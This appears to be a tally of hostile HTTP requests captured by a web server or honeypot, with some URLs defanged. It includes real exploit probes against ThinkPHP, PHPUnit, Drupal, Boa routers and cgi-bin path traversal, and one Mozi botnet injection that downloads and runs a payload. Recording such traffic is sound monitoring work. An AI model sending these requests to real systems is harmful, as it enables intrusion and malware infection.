1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/ccmadmin/showHome.do`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/muieblackcat`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/s/31332e36372e34342e323334/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/video/26176.html`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
2	HEAD	`/`	HTTP/1.0
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0